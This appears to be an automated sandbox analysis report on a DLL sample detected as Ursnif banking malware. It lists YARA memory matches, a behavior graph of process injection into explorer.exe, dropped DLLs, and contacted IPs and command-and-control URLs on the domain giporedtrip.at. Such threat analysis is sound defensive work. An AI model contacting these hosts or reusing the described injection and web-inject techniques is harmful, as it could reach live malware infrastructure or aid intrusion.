Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B44560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_04B44560

Stealing of Sensitive Information
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.385104161.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359568367.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384820134.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359628903.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365461570.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359660844.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384544638.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384666912.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445091094.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385135380.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445408460.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359611045.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.376576771.0000000004FCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384983299.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359512157.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.444990787.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384911047.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359647508.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385049802.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472502458.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472298096.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393830372.0000000003C6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472531811.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359541703.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359590748.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6104, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.385104161.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359568367.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384820134.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359628903.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365461570.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359660844.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384544638.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384666912.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445091094.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385135380.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445408460.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359611045.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.376576771.0000000004FCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384983299.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359512157.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.444990787.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384911047.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359647508.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385049802.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472502458.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472298096.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393830372.0000000003C6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472531811.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359541703.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359590748.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6104, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 558657 Sample: 61ee6edf7de65.dll Startdate: 24/01/2022 Architecture: WINDOWS Score: 100 96 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->96 98 Found malware configuration 2->98 100 Antivirus / Scanner detection for submitted sample 2->100 102 5 other signatures 2->102 9 loaddll32.exe 1 2->9         started        13 mshta.exe 19 2->13         started        15 mshta.exe 19 2->15         started        process3 dnsIp4 84 211.40.39.251, 49762, 80 LGDACOMLGDACOMCorporationKR Korea Republic of 9->84 86 121.136.102.4, 49765, 80 KIXS-AS-KRKoreaTelecomKR Korea Republic of 9->86 88 2 other IPs or domains 9->88 116 Writes to foreign memory regions 9->116 118 Allocates memory in foreign processes 9->118 120 Modifies the context of a thread in another process (thread injection) 9->120 122 3 other signatures 9->122 17 cmd.exe 1 9->17         started        19 control.exe 9->19         started        22 powershell.exe 34 13->22         started        24 powershell.exe 32 15->24         started        signatures5 process6 signatures7 26 rundll32.exe 1 17->26         started        104 Changes memory attributes in foreign processes to executable or writable 19->104 30 rundll32.exe 19->30         started        106 Injects code into the Windows Explorer (explorer.exe) 22->106 108 Writes to foreign memory regions 22->108 110 Modifies the context of a thread in another process (thread injection) 22->110 32 explorer.exe 22->32 injected 34 csc.exe 22->34         started        37 csc.exe 22->37         started        39 conhost.exe 22->39         started        112 Maps a DLL or memory area into another process 24->112 114 Creates a thread in another existing process (thread injection) 24->114 41 csc.exe 24->41         started        43 csc.exe 24->43         started        45 conhost.exe 24->45         started        process8 dnsIp9 90 138.36.3.134, 49761, 80 TEXNETSERVICOSDECOMUNICACAOEMINFORMATICALTDBR Brazil 26->90 92 61.98.7.132, 49763, 80 SKB-ASSKBroadbandCoLtdKR Korea Republic of 26->92 94 giporedtrip.at 91.203.174.38, 49760, 49764, 80 LITTEL-ASRU Uzbekistan 26->94 124 System process connects to network (likely due to code injection or exploit) 26->124 126 Writes to foreign memory regions 26->126 128 Allocates memory in foreign processes 26->128 138 3 other signatures 26->138 47 control.exe 26->47         started        130 Changes memory attributes in foreign processes to executable or writable 32->130 132 Self deletion via cmd delete 32->132 134 Disables SPDY (HTTP compression, likely to perform web injects) 32->134 136 Creates a thread in another existing process (thread injection) 32->136 50 cmd.exe 32->50         started        52 cmd.exe 32->52         started        54 cmd.exe 32->54         started        56 RuntimeBroker.exe 32->56 injected 76 C:\Users\user\AppData\Local\...\hddjt5kh.dll, PE32 34->76 dropped 58 cvtres.exe 34->58         started        78 C:\Users\user\AppData\Local\...\32ysuxeg.dll, PE32 37->78 dropped 60 cvtres.exe 37->60         started        80 C:\Users\user\AppData\Local\...\qmanv25g.dll, PE32 41->80 dropped 62 cvtres.exe 41->62         started        82 C:\Users\user\AppData\Local\...\vn3zgr4g.dll, PE32 43->82 dropped 64 cvtres.exe 43->64         started        file10 signatures11 process12 signatures13 140 Changes memory attributes in foreign processes to executable or writable 47->140 142 Injects code into the Windows Explorer (explorer.exe) 47->142 144 Writes to foreign memory regions 47->144 150 4 other signatures 47->150 146 Uses ping.exe to sleep 50->146 148 Uses ping.exe to check the status of other devices and networks 50->148 66 conhost.exe 50->66         started        68 PING.EXE 50->68         started        70 conhost.exe 52->70         started        72 PING.EXE 52->72         started        74 conhost.exe 54->74         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
211.40.39.251
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR true
138.36.3.134
 unknown Brazil
264562 TEXNETSERVICOSDECOMUNICACAOEMINFORMATICALTDBR true
91.203.174.38
 giporedtrip.at Uzbekistan
47141 LITTEL-ASRU true
121.136.102.4
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR true
61.98.7.132
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
giporedtrip.at 91.203.174.38 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://giporedtrip.at/drew/pT9VBE7JySNzTsraRHWIuA/M8mhqioMqf4SN/48wxFaOc/GQc3fQ5Dw6JPElmXEMT1WYW/8KiVfYSjGS/73gU4LPODDcjxF0SH/UKj5w7ReqWld/_2FD39lD5Kz/5xzi1kkBDyiun4/eX2QdVXKmn9zNv1_2Bebw/_2Bj1l2BOIC93Jzg/pa5W5iqolN8FKuR/6pqhw8soI60TcBnXsv/fUj7WBOr5/31qQZwplbi_2FEVv_2BA/_2Bg3LZPX_2FawVlqSQ/Z.jlk true
  • Avira URL Cloud: safe
 unknown
http://giporedtrip.at/drew/pNlxEnrdilKzWa9/68tqOS2uwrjSihitdE/jBbiWvTgb/3aw4cx4D47l6BXBjnON4/Fauxi0kACQab9CLvY1X/WoAQszl7aqCJx2eNbs5Szg/9_2BtMMZBWkCT/OWv_2Bj9/_2BPp2fGqVtSst7f7xYoQwH/mpPcfod9Hb/UB9Yz2aJsMDXWuTh9/ho2KCuunvmML/NRp1qNCJ2xT/_2BesCQrdlqKMQ/QvixSHRNiTVSEcLtfIY4h/0WwwQPgKD1/0.jlk true
  • Avira URL Cloud: safe
 unknown
http://giporedtrip.at/drew/OgX0J5PbJW4/wt7t22qhvnCn1v/lLndh_2BLbj_2BgCTZodo/VhmNj74z1QOstcs1/NN90KirQSsQ7O2C/HXs9eov9kNfgxo2ZRo/blD2X9oTA/M3ehnbfCXj_2BeiQgXKb/ucd0O60r4p_2FWGe4LI/GsQ05hEXJYX7DSeaALXgs4/LJcXahVRDT7HM/rEWRRjo9/OWoa99fWOrLG2ix_2FmfkKa/0wqwnttzjd/MMGwD_2BqOxL_2FmQ/i0rZ3L37/7n5Zr.jlk true
  • Avira URL Cloud: safe
 unknown
http://giporedtrip.at/drew/gpOOKQHU5/YopsneUUMix_2FGZrYk_/2FaCL9055O3rYKveg_2/BMYcLHEW_2B6_2BH1_2BIq/GCl9SqJ3zsF0h/uRiHRooG/iudFhrDMGJm_2FRN_2B6NM1/3JT_2Fq7zu/oEYGlG6hebhX439sT/jKSRQO714RRJ/qnfBGC5Rexs/FY6AfhSs_2BBga/CepUQnIMaDyzjxjJywQMp/Sbr0hGta57ccL2mG/IT9OtCUdHxKRc1l/X3mCPG6cz5ucxws3EJ/_2FMMYlE/Q.jlk true
  • Avira URL Cloud: safe
 unknown